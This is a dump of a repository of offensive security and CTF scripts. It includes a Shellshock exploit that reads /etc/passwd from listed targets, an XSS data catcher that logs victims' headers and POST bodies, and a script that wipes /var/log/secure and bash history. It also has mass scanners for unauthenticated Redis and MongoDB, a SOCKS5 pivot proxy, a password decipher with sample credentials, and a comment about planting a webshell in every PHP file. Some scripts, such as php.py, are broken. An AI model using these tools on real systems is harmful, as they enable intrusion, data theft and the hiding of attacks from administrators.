-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Python Dynamic Socks5 Proxy 3 | # Usage: python socks5.py 1080 4 | # Background Run: nohup python s5.py 1080 & 5 | 6 | import socket, sys, select, SocketServer, struct, time 7 | 8 | class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass 9 | class Socks5Server(SocketServer.StreamRequestHandler): 10 | def handle_tcp(self, sock, remote): 11 | fdset = [sock, remote] 12 | while True: 13 | r, w, e = select.select(fdset, [], []) 14 | if sock in r: 15 | if remote.send(sock.recv(4096)) <= 0: break 16 | if remote in r: 17 | if sock.send(remote.recv(4096)) <= 0: break 18 | def handle(self): 19 | try: 20 | pass # print 'from ', self.client_address nothing to do. 21 | sock = self.connection 22 | # 1. Version 23 | sock.recv(262) 24 | sock.send("\x05\x00"); 25 | # 2. 
Request 26 | data = self.rfile.read(4) 27 | mode = ord(data[1]) 28 | addrtype = ord(data[3]) 29 | if addrtype == 1: # IPv4 30 | addr = socket.inet_ntoa(self.rfile.read(4)) 31 | elif addrtype == 3: # Domain name 32 | addr = self.rfile.read(ord(sock.recv(1)[0])) 33 | port = struct.unpack('>H', self.rfile.read(2)) 34 | reply = "\x05\x00\x00\x01" 35 | try: 36 | if mode == 1: # 1. Tcp connect 37 | remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | remote.connect((addr, port[0])) 39 | pass # print 'To', addr, port[0] nothing do to. 40 | else: 41 | reply = "\x05\x07\x00\x01" # Command not supported 42 | local = remote.getsockname() 43 | reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1]) 44 | except socket.error: 45 | # Connection refused 46 | reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00' 47 | sock.send(reply) 48 | # 3. Transfering 49 | if reply[1] == '\x00': # Success 50 | if mode == 1: # 1. Tcp connect 51 | self.handle_tcp(sock, remote) 52 | except socket.error: 53 | pass #print 'error' nothing to do . 54 | except IndexError: 55 | pass 56 | def main(): 57 | filename = sys.argv[0]; 58 | if len(sys.argv)<2: 59 | print 'usage: ' + filename + ' port' 60 | sys.exit() 61 | socks_port = int(sys.argv[1]); 62 | server = ThreadingTCPServer(('', socks_port), Socks5Server) 63 | print 'bind port: %d' % socks_port + ' ok!' 
64 | server.serve_forever() 65 | if __name__ == '__main__': 66 | main() -------------------------------------------------------------------------------- /scripts/xssget.php: -------------------------------------------------------------------------------- 1 | filename = $filename; 8 | } 9 | 10 | public function Flow() 11 | { 12 | /* Method */ 13 | $flowdata['method'] = $_SERVER['REQUEST_METHOD']; 14 | /* Header */ 15 | $arr = array( 16 | 'HTTP_HOST', 17 | 'HTTP_REFERER', 18 | 'HTTP_USER_AGENT' 19 | // 'HTTP_ACCEPT', 20 | // 'HTTP_ACCEPT_LANGUAGE', 21 | // 'HTTP_ACCEPT_ENCODING', 22 | // 'HTTP_CONNECTION' 23 | ); 24 | foreach($arr as $key){ 25 | $flowdata['Header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = $_SERVER[$key]; 26 | } 27 | /* Url */ 28 | $flowdata['uri'] = $_SERVER['REQUEST_URI']; 29 | /* Protocol */ 30 | $flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL']; 31 | /* IP */ 32 | $flowdata['ip'] = array( 33 | 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 34 | 'CLIENT_IP'=>$_SERVER['HTTP_CLIENT_IP'], 35 | 'X_FORWARDED_FOR'=>$_SERVER['HTTP_X_FORWARDED_FOR'] 36 | ); 37 | /* Time */ 38 | $flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']); 39 | /* CONTENT_TYPE */ 40 | $flowdata['ctype'] = $_SERVER['CONTENT_TYPE']; 41 | /* PostData */ 42 | if(isset($_POST) or strtolower($flowdata['Method']) == 'post' ){ 43 | if($flowdata['ctype'] == 'application/x-www-form-urlencoded'){ 44 | $flowdata['post'] = $_post; 45 | }else{ 46 | $flowdata['post'] = file_get_contents('php://input'); 47 | } 48 | } 49 | $this->WriteFile($this->filename,print_r($flowdata,true),FILE_APPEND); 50 | } 51 | 52 | public function WriteFile($filename,$content,$FILE_APPEND=FILE_APPEND) 53 | { 54 | file_put_contents($filename,$content,$FILE_APPEND); 55 | } 56 | } 57 | 58 | $Catchs = new GetFromXSS('log.txt'); 59 | $Catchs->Flow(); 60 | ?> -------------------------------------------------------------------------------- /scripts/xxtea_decrypt.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // flag{xxtea_1s_1nterest1ng_ha-_-ha} 7 | 8 | #define DELTA 0x9e3779b9 // 2654435769 9 | #define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))) 10 | 11 | 12 | void btea(uint32_t *, int, uint32_t const key[4]); 13 | void pack(uint64_t *, uint32_t, uint32_t); 14 | void unpack(uint64_t , uint32_t *, uint32_t *); 15 | 16 | char crypt[300]="\x56\x95\xd7\xfb\x7b\xd5\xb4\x8b\xe6\xd2\xba\xa4\x4c\x71\x52\xa4\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x3b\x62\x5f\x64\xfd\x5e\x02\x03\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x0d\xc8\xb3\x93\x3b\x34\x01\x25\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x18\xb7\x12\xac\x14\x40\x5c\xca\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x0d\xc8\xb3\x93\x3b\x34\x01\x25\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x1f\x27\x75\xa5\x94\x46\x27\xe3\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x1f\x27\x75\xa5\x94\x46\x27\xe3\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xd8\xf3\x37\x26\x1f\x46\xff\x17\x5d\x88\x2e\x70\xef\xd7\x12\xb3"; 17 | 18 | 19 | int main(int argc, char *argv[]) 20 | { 21 | uint32_t key[4] = {0x342d3221, 0x4320fa22, 0x46257a42, 0x9002bf22}; 22 | uint64_t b64; 23 | uint32_t b64_split[2]; 24 | int ji=0; 25 | 26 | while (1) { 27 | if (ji>=35) { 28 | return 0; 29 | } 30 | memcpy(&b64,&crypt[8*ji],8); 31 | //fread(&b64, sizeof(uint64_t), 1, stdin); 32 | if (b64 == 
0x00000000ffffffff) 33 | break; 34 | unpack(b64, &b64_split[0], &b64_split[1]); 35 | 36 | btea(b64_split, -2, key); 37 | 38 | pack(&b64, b64_split[0], b64_split[1]); 39 | 40 | putc(b64, stdout); 41 | 42 | ji+=1; 43 | } 44 | 45 | return 0; 46 | } 47 | 48 | 49 | void btea(uint32_t *v, int n, uint32_t const key[4]) 50 | { 51 | uint32_t y, z, sum; 52 | unsigned p, rounds, e; 53 | n = -n; 54 | rounds = 6 + 52/n; 55 | sum = rounds * DELTA; 56 | y = v[0]; 57 | do { 58 | e = (sum >> 2) & 3; 59 | for (p = n - 1; p > 0; p--) { 60 | z = v[p - 1]; 61 | y = v[p] -= MX; 62 | } 63 | z = v[n - 1]; 64 | y = v[0] -= MX; 65 | sum -= DELTA; 66 | } while (--rounds); 67 | } 68 | 69 | 70 | void pack(uint64_t *b64, uint32_t b32_0, uint32_t b32_1) 71 | { 72 | *b64 = ((uint64_t) b32_0) << 32 | b32_1; 73 | } 74 | 75 | 76 | void unpack(uint64_t b64, uint32_t *b32_0, uint32_t *b32_1) 77 | { 78 | *b32_0 = (uint32_t)((b64 & 0xFFFFFFFF00000000) >> 32); 79 | *b32_1 = (uint32_t)(b64 & 0xFFFFFFFF); 80 | } 81 | -------------------------------------------------------------------------------- /sh/clear_log.sh: -------------------------------------------------------------------------------- 1 | sed -i '/publickey/d' /var/log/secure \ 2 | && sed -i '/log/d' ~/.bash_history \ 3 | && sed -i '/history/d' ~/.bash_history \ 4 | && sed -i '/sed/d' ~/.bash_history \ 5 | && sed -i '/sh/d' ~/.bash_history -------------------------------------------------------------------------------- /sh/echo.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while true;do 3 | ls -al; 4 | sleep 5s; 5 | done 6 | -------------------------------------------------------------------------------- /sh/ftpd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ftp -n <<- EOF 3 | open 211.71.232.55 4 | user anonymous 123 5 | cd log 6 | bin 7 | get s.txt 8 | bye 9 | EOF 
-------------------------------------------------------------------------------- /sh/install_waf.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | tar -zcvf wwwback.tar.gz ./ 3 | 4 | mv waf.php waf.phpbk 5 | 6 | #在每个.php文件第一行写入包含waf 7 | phpfile=$(find -name '*.php') 8 | for pf in $phpfile 9 | do 10 | sed -i '1 i\' $pf #应该写waf的绝对路径 11 | done 12 | #在每一个php文件最后插马 13 | #sed -i '$ a\' xxx.php 14 | #还原waf,以其他php正确包含waf 15 | mv waf.phpbk waf.php 16 | 17 | -------------------------------------------------------------------------------- /tools/Rescan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #author=Cond0r@CodeScan 3 | import socket 4 | import threading 5 | from concurrent import futures 6 | from Queue import Queue 7 | from sys import argv 8 | import ipaddr 9 | import sys 10 | socket.setdefaulttimeout(3) 11 | data=''' 12 | Lib: 13 | https://github.com/google/ipaddr-py 14 | https://pypi.python.org/pypi/futures 15 | pip install futures 16 | Usage: 17 | python rescan.py -f inputfile.txt 18 | inputfile.txt: 19 | 10.14.40.194:6379 20 | python rescan.py -i 192.168.1.1/24 -p 6379 21 | ''' 22 | target_list=[] 23 | def stdout( name): 24 | scanow ='[*] Scan %s.. 
'%(name) 25 | sys.stdout.write(str(scanow)+" "*20+"\b\b\r") 26 | sys.stdout.flush() 27 | def extract_target(inputfile): 28 | global target_list 29 | inputdata=open(inputfile).read().replace("\r",'').split("\n") 30 | for host in inputdata: 31 | host=host.split(":") 32 | if len(host)==2: 33 | target_list.append("%s:%s"%(host[0],host[1])) 34 | elif len(host)==1: 35 | target_list.append("%s:6379"%(host[0])) 36 | return target_list 37 | def send_dbsize(conn): 38 | try: 39 | conn.send("dbsize\n") 40 | recv=conn.recv(5) 41 | conn.close() 42 | recv=recv.replace("\n",''), 43 | return recv 44 | except: 45 | return False 46 | 47 | def conn_redis(args): 48 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | args=args.split(":") 50 | host=args[0] 51 | port=int(args[1]) 52 | try: 53 | client.connect((host, port)) 54 | return client 55 | except: 56 | return False 57 | def run_task(target): 58 | stdout(target) 59 | conn=conn_redis(target) 60 | if conn: 61 | size=send_dbsize(conn) 62 | size=str(size) 63 | if 'NOAUTH' not in size and ':' in size: 64 | return "[!] 
Find %s Unauthorized "% target 65 | def main(): 66 | targetlist=[] 67 | if len(argv)>2: 68 | if argv[1]=='-f': 69 | return extract_target(argv[2]) 70 | if argv[1]=='-i': 71 | port=6379 72 | if len(argv)==5: 73 | port=int(argv[4]) 74 | targets = ipaddr.IPv4Network(argv[2]) 75 | for tar in targets: 76 | targetlist.append("%s:%d"%(tar,port)) 77 | return targetlist 78 | 79 | 80 | 81 | if len(argv)<3: 82 | print data 83 | exit() 84 | 85 | target_list=main() 86 | 87 | thread_pool = futures.ThreadPoolExecutor(max_workers=10) 88 | for i in thread_pool.map(run_task, target_list): 89 | if i!=None: 90 | print i 91 | -------------------------------------------------------------------------------- /tools/bash.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import urllib2,re 3 | import urllib 4 | 5 | def bash_exp(url): 6 | regex = re.compile(r'/root:/bin/bash') 7 | header = { 8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 9 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 10 | 'Accept-Encoding': 'gzip,deflate,sdch', 11 | 'Accept-Language': 'en-US,en;q=0.8', 12 | 'Connection': 'keep-alive', 13 | 'User-Agent': '() { :;}; echo `/bin/cat /etc/passwd`', 14 | 'Referer': 'http://www.google.com.hk' 15 | } 16 | request = urllib2.Request(url,headers = header) 17 | try: 18 | res = urllib2.urlopen(request) 19 | if re.findall(regex,res.read()): 20 | print u"bash: %s"%(url) 21 | else: 22 | print u"无bash漏洞: %s"%(url) 23 | res.close() 24 | except Exception: 25 | print u"访问网页超时%s"%(url) 26 | 27 | if __name__=='__main__': 28 | f = open('target.txt','r') 29 | for i in f.readlines(): 30 | bash_exp(urllib.unquote(i)) 31 | f.close() 32 | -------------------------------------------------------------------------------- /tools/drcom/Decipher.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/drcom/Decipher.class -------------------------------------------------------------------------------- /tools/drcom/Decipher.java: -------------------------------------------------------------------------------- 1 | // 145014129 Nk(Ga!a 2 | // xxy145014129 Mk*Gd#a 3 | 4 | // javac filename 5 | // java classname 6 | public class Decipher { 7 | 8 | private static final int MIN_ASC = 32; 9 | private static final int MAX_ASC = 126; 10 | private static final int NUM_ASC = 95; 11 | private static final long MYPRIMENUMBER = 100537L; 12 | private static final long MYPRIMENUMBER2 = 100609L; 13 | private static final String KEYWORD = "TblRefreshCurMonthServiceUse"; 14 | 15 | 16 | public static void main(String[] args) 17 | { 18 | System.out.println("============"); 19 | // String from_text = "Nk(Ga!a"; 20 | System.out.println(args[0]); 21 | String from_text = args[0]; 22 | String a = Decipher(from_text); 23 | System.out.println(a); 24 | System.out.println("============"); 25 | } 26 | 27 | public static String Decipher(String from_text) 28 | { 29 | char[] word = from_text.toCharArray(); 30 | StringBuilder to_text = new StringBuilder(); 31 | // long key = NumericPassword("TblRefreshCurMonthServiceUse"); 32 | long key = 30137; 33 | int str_len = from_text.length() - 1; 34 | for (int i = 0; i < str_len; i++) { 35 | word[i] = from_text.charAt(i); 36 | int ch = word[i]; 37 | if ((ch >= 32) && (ch <= 126)) { 38 | i++; 39 | ch -= 32; 40 | double offset = 96.0D * ( key * i % 100537L / 100537.0D); 41 | ch = (ch - (int)offset) % 95; 42 | if (ch < 0) 43 | ch += 95; 44 | ch += 32; 45 | i--; 46 | to_text.append((char)ch); 47 | } 48 | } 49 | return to_text.toString(); 50 | } 51 | /* 52 | private static long NumericPassword(String password) 53 | { 54 | long shift1 = 0L; 55 | long shift2 = 0L; 56 | long value = 0L; 57 | int str_len = password.length(); 58 | for (int i = 0; i < str_len; i++) { 
59 | long ch = password.charAt(i); 60 | value ^= ch * MyIndex(shift1); 61 | value ^= ch * MyIndex(shift2); 62 | shift1 = (shift1 + 7L) % 19L; 63 | shift2 = (shift2 + 13L) % 23L; 64 | } 65 | value = (value ^ 0x18901) % 100537L; 66 | return value; 67 | } 68 | 69 | private static long MyIndex(long shadow) 70 | { 71 | long j = 1L; 72 | for (long i = 1L; i <= shadow; i += 1L) 73 | j *= 2L; 74 | return j; 75 | } 76 | */ 77 | } -------------------------------------------------------------------------------- /tools/drcom/Decipher.py: -------------------------------------------------------------------------------- 1 | def Decipher(s): 2 | p = '' 3 | key = 30137 4 | for i in xrange(len(s) - 1): 5 | ch = ord(s[i]) 6 | if ch >= 32 and ch <= 126: 7 | ch -= 32 8 | offset = int(96.0 * (key * (i + 1) % 100537 / 100537.0)) 9 | ch = (ch - offset) % 95 10 | if ch < 0: 11 | ch += 95 12 | ch += 32 13 | p += chr(ch) 14 | return p 15 | 16 | 17 | def save(fff, txt): 18 | f = open(fff, 'a') 19 | for i in txt: 20 | f.write(i) 21 | f.close() 22 | 23 | 24 | def fuck(): 25 | ll = [] 26 | f = open('x.txt') 27 | x = 1 28 | try: 29 | c = f.readlines() 30 | for i in c: 31 | i = i[1:-2].replace("\",\"", "####") 32 | t = i.split("####") 33 | ll.append(t[0] + "," + Decipher(t[1]) + "," + t[2] + ",\n") 34 | except: 35 | pass 36 | finally: 37 | save(ll) 38 | f.close() 39 | 40 | if __name__ == '__main__': 41 | # fuck('pwd.txt') 42 | print Decipher('''Sr'J`%a''') 43 | -------------------------------------------------------------------------------- /tools/elasticsearch.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/elasticsearch.py -------------------------------------------------------------------------------- /tools/ftp.py: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/ftp.py -------------------------------------------------------------------------------- /tools/google.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | __author__ = 'DM_' 3 | import simplejson,random 4 | import requests as req 5 | 6 | page = 1 7 | status = 200 8 | dock = str(raw_input('请输入google关键字:')) #这里是google关键词. 9 | while status == 200: 10 | headers = { 11 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 12 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 13 | 'Accept-Encoding': 'gzip,deflate,sdch', 14 | 'Accept-Language': 'en-US,en;q=0.8', 15 | 'Connection': 'keep-alive', 16 | 'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', 17 | 'Referer': 'http://www.baidu.com/' 18 | } 19 | 20 | url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s"%(dock,page) 21 | try: 22 | HtmlContent = req.get(url, timeout=30, headers=headers).text 23 | result = simplejson.loads(HtmlContent) 24 | status = result['responseStatus'] 25 | 26 | print "第%d页的数据:" % page 27 | try: 28 | Urls = result['responseData']['results'] 29 | for url in Urls: 30 | print url['url'] 31 | except: 32 | print '当前页面获取失败.' 33 | print result['responseDetails'] 34 | page += 1 35 | except: 36 | print "Time Out or site is not open." 
37 | print "一共有%d页的数据" % (page-2) 38 | -------------------------------------------------------------------------------- /tools/iis_shortname_Scan.py: -------------------------------------------------------------------------------- 1 | # encoding=gbk 2 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com 3 | 4 | import sys 5 | import httplib 6 | import urlparse 7 | import string 8 | import threading 9 | import Queue 10 | import time 11 | import string 12 | 13 | 14 | class Scanner(): 15 | def __init__(self, target): 16 | self.target = target 17 | self.scheme, self.netloc, self.path, params, query, fragment = \ 18 | urlparse.urlparse(target) 19 | if self.path[-1:] != '/': # ends with slash 20 | self.path += '/' 21 | self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-') 22 | self.files = [] 23 | self.dirs = [] 24 | self.queue = Queue.Queue() 25 | self.lock = threading.Lock() 26 | self.threads = [] 27 | 28 | 29 | def _conn(self): 30 | try: 31 | if self.scheme == 'https': 32 | conn = httplib.HTTPSConnection(self.netloc) 33 | else: 34 | conn = httplib.HTTPConnection(self.netloc) 35 | return conn 36 | except Exception, e: 37 | print '[Exception in function _conn]', e 38 | return None 39 | 40 | # fetch http response status code 41 | def _get_status(self, path): 42 | try: 43 | conn = self._conn() 44 | conn.request('GET', path) 45 | status = conn.getresponse().status 46 | conn.close() 47 | return status 48 | except Exception, e: 49 | raise Exception('[Exception in function _get_status] %s' % str(e) ) 50 | 51 | # test weather the server is vulerable 52 | def is_vul(self): 53 | try: 54 | status_1 = self._get_status(self.path + '/*~1****/a.aspx') # an existed file/folder 55 | status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx') # not existed file/folder 56 | if status_1 == 404 and status_2 == 400: 57 | return True 58 | return False 59 | except Exception, e: 60 | raise Exception('[Exception in function is_val] %s' % str(e) ) 61 | 62 | def 
run(self): 63 | # start from root path 64 | for payload in self.payloads: 65 | self.queue.put( (self.path + payload, '****') ) # filename, extention 66 | for i in range(10): 67 | t = threading.Thread(target=self._scan_worker) 68 | self.threads.append(t) 69 | t.start() 70 | 71 | def report(self): 72 | for t in self.threads: 73 | t.join() 74 | self._print('-'* 64) 75 | for d in self.dirs: 76 | self._print('Dir: ' + d) 77 | for f in self.files: 78 | self._print('File: ' + f) 79 | self._print('-'*64) 80 | self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) ) 81 | 82 | 83 | def _print(self, msg): 84 | self.lock.acquire() 85 | print msg 86 | self.lock.release() 87 | 88 | def _scan_worker(self): 89 | while True: 90 | try: 91 | url, ext = self.queue.get(timeout=3) 92 | status = self._get_status(url + '*~1' + ext + '/1.aspx') 93 | if status == 404: 94 | self._print('Found ' + url + ext + '\t[scan in progress]') 95 | 96 | if len(url) - len(self.path)< 6: # enum first 6 chars only 97 | for payload in self.payloads: 98 | self.queue.put( (url + payload, ext) ) 99 | else: 100 | if ext == '****': # begin to scan extention 101 | for payload in string.ascii_lowercase: 102 | self.queue.put( (url, '*' + payload + '**') ) 103 | self.queue.put( (url,'') ) # also it can be a folder 104 | elif ext.count('*') == 3: 105 | for payload in string.ascii_lowercase: 106 | self.queue.put( (url, '*' + ext[1] + payload + '*') ) 107 | elif ext.count('*') == 2: 108 | for payload in string.ascii_lowercase: 109 | self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) ) 110 | elif ext == '': 111 | self.dirs.append(url + '~1') 112 | self._print('Found Dir ' + url + '~1\t[Done]') 113 | 114 | elif ext.count('*') == 1: 115 | self.files.append(url + '~1.' + ext[1:]) 116 | self._print('Found File ' + url + '~1.' 
+ ext[1:] + '\t[Done]') 117 | except Exception,e: 118 | break 119 | 120 | 121 | 122 | if len(sys.argv) == 1: 123 | print 'Usage: %s target' % sys.argv[0] 124 | sys.exit() 125 | 126 | file = sys.argv[1] 127 | fobj = open(file,'r') 128 | fileHandle = open('vul.txt','a+') 129 | for target in fobj: 130 | print target.strip() 131 | s = Scanner(target.strip()) 132 | if not s.is_vul(): 133 | print 'NO vulerable' 134 | #sys.exit(0) 135 | else: 136 | fileHandle.write(target) 137 | print 'server is vulerable' 138 | #s.run() 139 | #s.report() 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /tools/ip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding=utf-8 3 | 4 | import optparse,re,sys,os 5 | 6 | def getip(_txt): 7 | result = [] 8 | f = open(_txt,"r") 9 | line = f.read() 10 | result = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', line) 11 | result = {}.fromkeys(result).keys() 12 | return result 13 | 14 | def ping(hosts): 15 | ipss = [] 16 | for i in hosts: 17 | ret = os.system("ping -c 1 -t 1 %s > nop" % i) 18 | #ret = os.system("ping -n 1 -w 1 %s > nop" % i) 19 | if not ret: 20 | ipss.append(i) 21 | return ipss 22 | 23 | 24 | if __name__ == '__main__': 25 | txt = [] 26 | parser = optparse.OptionParser('usage: %prog [options] target') 27 | parser.add_option('-t','--threads', dest='threads_num',default=20, type='int',help='Number of threads. 
default = 20') 28 | parser.add_option('-f', '--file', dest='names_file',default='false', type='string',help='files default = false') 29 | (options, args) = parser.parse_args() 30 | 31 | if str(options.names_file) == "false": 32 | if len(args) < 1 : 33 | parser.print_help() 34 | sys.exit(0) 35 | txt = ping(getip(str(options.names_file))) 36 | print txt 37 | -------------------------------------------------------------------------------- /tools/jinzhi.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import binascii 5 | 6 | __info__ = { 7 | "desc": "A script for running firesun's verify code", 8 | "version": "1.0", 9 | "usage": "", 10 | "Error": "This script has some error" 11 | } 12 | 13 | 14 | def str_to_bin_num(s): 15 | xx = '' 16 | for i in s: 17 | x = bin(ord(i)).replace('0b', '') 18 | if len(x) < 8: 19 | x = '0' + x 20 | xx += x 21 | return xx 22 | 23 | 24 | def str_to_bin_num_2(s): 25 | xx = '' 26 | for i in s: 27 | xx += bin(ord(i)).replace('0b', '') 28 | xx += ',' 29 | return xx[:-1] 30 | 31 | 32 | def bin_num_to_str(b): 33 | x = '' 34 | i = 8 35 | while i <= len(b): 36 | o = int('0b' + b[i - 8:i], base=2) 37 | x += chr(o) 38 | i += 8 39 | return x 40 | 41 | 42 | def bin_num_to_hex(b): 43 | x = '' 44 | i = 8 45 | while i <= len(b): 46 | x += str(hex(int('0b' + b[i - 8:i], base=2))).replace('0x', '\\x') 47 | i += 8 48 | return x 49 | 50 | 51 | def bin_num_to_hex2(b): 52 | x = '' 53 | i = 8 54 | while i <= len(b): 55 | x += str(hex(int('0b' + b[i - 8:i], base=2))).replace('0x', '') 56 | i += 8 57 | return '0x' + x 58 | 59 | 60 | def fuck2(a, b): 61 | x = '' 62 | for i in xrange(len(a)): 63 | x += str(int(a[i]) ^ int(b[i])) 64 | return x 65 | 66 | if __name__ == '__main__': 67 | a = str_to_bin_num('javascript:alert(/xss/);') 68 | c = bin_num_to_hex(a) 69 | print c 70 | -------------------------------------------------------------------------------- 
/tools/md5_collision_bin/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | url = "http://ctf.xjnu.edu.cn:9900/web80/flag_Revenge_2333333.php" 3 | b1 = '\x4d\xc9\x68\xff\x0e\xe3\x5c\x20\x95\x72\xd4\x77\x7b\x72\x15\x87' + \ 4 | '\xd3\x6f\xa7\xb2\x1b\xdc\x56\xb7\x4a\x3d\xc0\x78\x3e\x7b\x95\x18' + \ 5 | '\xaf\xbf\xa2\x00\xa8\x28\x4b\xf3\x6e\x8e\x4b\x55\xb3\x5f\x42\x75' + \ 6 | '\x93\xd8\x49\x67\x6d\xa0\xd1\x55\x5d\x83\x60\xfb\x5f\x07\xfe\xa2' 7 | b2 = '\x4d\xc9\x68\xff\x0e\xe3\x5c\x20\x95\x72\xd4\x77\x7b\x72\x15\x87' +\ 8 | '\xd3\x6f\xa7\xb2\x1b\xdc\x56\xb7\x4a\x3d\xc0\x78\x3e\x7b\x95\x18' +\ 9 | '\xaf\xbf\xa2\x02\xa8\x28\x4b\xf3\x6e\x8e\x4b\x55\xb3\x5f\x42\x75' +\ 10 | '\x93\xd8\x49\x67\x6d\xa0\xd1\xd5\x5d\x83\x60\xfb\x5f\x07\xfe\xa2' 11 | # data = {'param1': open("message1.bin", "rb").read(), 12 | # 'param2': open("message2.bin", "rb").read()} 13 | data = {'param1': b1, 14 | 'param2': b2} 15 | r = requests.post(url, data=data) 16 | print(r.text) 17 | -------------------------------------------------------------------------------- /tools/md5_collision_bin/message1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/md5_collision_bin/message1.bin -------------------------------------------------------------------------------- /tools/md5_collision_bin/message2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/md5_collision_bin/message2.bin -------------------------------------------------------------------------------- /tools/mongdb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import pymongo 4 | import random 5 | 6 | fobj = open('27017.txt','r') 7 | fileHandle = 
open('vul.txt','a+') 8 | for target in fobj: 9 | ip_addr = target.strip() 10 | try: 11 | print target.strip() 12 | conn = pymongo.MongoClient(ip_addr, 27017, socketTimeoutMS=3000) 13 | print "ok" 14 | fileHandle.write(target) 15 | except Exception, e: 16 | print "can't conn" -------------------------------------------------------------------------------- /tools/php.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys,httplib 5 | from optparse import OptionParser 6 | usageString = "Usage: %prog [options] hostname" 7 | parser = OptionParser(usage=usageString) 8 | (opts,args) = parser.parse_args() 9 | if len(args) < 1: 10 | parser.error("Hostname is required") 11 | print __doc__ 12 | file = sys.argv[1] 13 | fobj = open(redis.txt,'r') 14 | fileHandle = open('php.txt','a+') 15 | for target in fobj: 16 | website = target.strip() 17 | #login path 18 | dirs = ["phpinfo.php","php.php","test.php","1.php"] 19 | for line in dirs: 20 | conn = httplib.HTTPConnection(website) 21 | conn.request('GET','/'+line) 22 | r1 = conn.getresponse() 23 | if r1.status == 200 or r1.status == 301 or r1.status == 403: 24 | print website+'/'+line,r1.status,r1.reason 25 | if not s.is_vul(): 26 | print 'NO vulerable' 27 | #sys.exit(0) 28 | else: 29 | fileHandle.write(target) 30 | print 'server is vulerable' 31 | -------------------------------------------------------------------------------- /tools/php_mt_seed-3.2.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/php_mt_seed-3.2.tar.gz -------------------------------------------------------------------------------- /tools/png_create.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
